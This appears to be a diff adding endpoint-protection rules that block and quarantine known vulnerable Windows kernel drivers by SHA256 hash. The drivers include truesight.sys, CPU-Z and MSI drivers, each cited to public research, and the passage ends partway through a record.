+ "hl_testing_start_time": "2026-03-23T11:45:31.490287Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f37a48bf6871ed1e58b818be7506e2e05bb403a7dbcde6c785d31bad3c6cf056",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "326edf91-0bab-5535-aaf2-b96e85ca99d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154484Z",
+ "creation_date": "2026-03-23T11:45:31.154486Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d29f601fec6ac5fc0ff035113f4b8b1863f34ff60e3f0f2731c515fc0efa36eb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "326fe57f-d0c0-5dba-9725-1e342912ffc9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824762Z",
+ "creation_date": "2026-03-23T11:45:31.824764Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824769Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d175169e3fcebe92b1c6b560d0c160ffe0fa6a826f3a5042b9b2ab140f6aed8b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32700161-2505-5d17-9f7c-8026563eecf1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146761Z",
+ "creation_date": "2026-03-23T11:45:31.146762Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146768Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23be2c7ad6e444bbf9c273380d3646ac62a684d37370f378c56ce9ddb9646d2e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32707a4f-1fc3-542f-b935-dc1aff83457d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825341Z",
+ "creation_date": "2026-03-23T11:45:30.825345Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825352Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "689f565e874b6d0232bbd946bb3c1e373d634512d1afa0b9ab90d45e507c85ac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32825e6b-b9b8-5864-9882-c5f98a7f0eeb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978977Z",
+ "creation_date": "2026-03-23T11:45:29.978979Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978984Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fafa1bb36f0ac34b762a10e9f327dcab2152a6d0b16a19697362d49a31e7f566",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32841b1a-8ca9-5e06-904b-24623b286c5c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143260Z",
+ "creation_date": "2026-03-23T11:45:32.143262Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143268Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1f4949f76d8ac9f2fa844d16b1b45fb1375d149d46e414e4a4c9424dc66c91f",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "328764df-64e0-5924-8b11-b07fd84a4bb3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610724Z",
+ "creation_date": "2026-03-23T11:45:29.610726Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610731Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aebcbfca180e372a048b682a4859fd520c98b5b63f6e3a627c626cb35adc0399",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3292cc44-dd4e-507b-85e9-70227d33d597",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820752Z",
+ "creation_date": "2026-03-23T11:45:31.820755Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820763Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c5426d89f7b6c799c34932e4a611e68ecf84f1d227fc64214e53bd94afc55d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32aab162-ba62-57e7-90ef-1e32670fd2c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833092Z",
+ "creation_date": "2026-03-23T11:45:30.833096Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833105Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b133de6cbfcf087f25760800516ffe28457b18925ebc7d162f7c6926fcce4741",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32ab2447-809c-5718-b0cc-7cf94ea5d9ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614787Z",
+ "creation_date": "2026-03-23T11:45:29.614789Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614795Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c10e2ec4f9ef591415f9a784b93dc9c9cdafa7c69602c0dc860c5b62222e449",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32bcc1dc-18ea-590e-bbed-e62f28d8ae3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812046Z",
+ "creation_date": "2026-03-23T11:45:31.812048Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812053Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "461cd721500c149bc6a1051437b75a7848c2cc63f010cb1d9fd6b432afd11b04",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32c03f51-a1d8-504a-8713-4313c30de4fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824376Z",
+ "creation_date": "2026-03-23T11:45:31.824379Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824388Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5104b29da9711075558e2197a4e82923dd5dba8ac9e5973954c1ee7215cd427",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32cac183-96fa-513e-97ca-ba91113eda50",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820599Z",
+ "creation_date": "2026-03-23T11:45:30.820601Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820607Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed3448152bcacf20d7c33e9194c89d5304dee3fba16034dd0cc03a3374e63c91",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32d12ab1-5290-5245-bc54-bc2d9e96abba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820135Z",
+ "creation_date": "2026-03-23T11:45:31.820139Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820147Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f3674ad46425d496e246cb95a21df0198bdfa3c259aef6f35dd8f215fb295cb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32e366ce-b86d-585d-91f8-16f0206994dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474245Z",
+ "creation_date": "2026-03-23T11:45:30.474248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474257Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2815c91fe5053899593cec83218b8dff85cfd85cea667dbbf2153cbc3cde000f",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32e51e7c-1eb2-51fd-87aa-02d3c07ae84c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809210Z",
+ "creation_date": "2026-03-23T11:45:31.809213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809221Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43e851763ab1b28fa121216cd7ed92525ed9ca3f69abba8b753ba8500620d2e5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32e602b9-0718-55d7-8f9d-87c2452e0aae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153506Z",
+ "creation_date": "2026-03-23T11:45:31.153508Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153514Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ca5aa8d7bb7d926961f1af8ae909780e8e10e16c2f8f118e0c78c635b28cfc0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32e8da6d-fe91-5cfa-b846-b18c0a08a01d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809881Z",
+ "creation_date": "2026-03-23T11:45:31.809884Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809890Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c435b76b1753a9d778a5030e910519c1617d77fad5811a76936e15b21d69c3f5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3312c1a0-08aa-57e0-aefb-5a8f62302e79",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151072Z",
+ "creation_date": "2026-03-23T11:45:31.151075Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151080Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15d2b157135b3ee811ab5bde67947a29d67e0ebc1646c3dd760bbc2d4996e634",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "331711ad-039d-52e3-8c32-03c38328ef7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612283Z",
+ "creation_date": "2026-03-23T11:45:29.612285Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612290Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3321e356-33e7-5603-8353-2c12bf63cd68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498973Z",
+ "creation_date": "2026-03-23T11:45:31.498976Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498985Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f4084cce01f18932a01239b1501b6707ca60642293e54b50c59b050f28da6d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "332dccb2-8bc4-52b8-b97c-659a72ab043e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983175Z",
+ "creation_date": "2026-03-23T11:45:29.983177Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
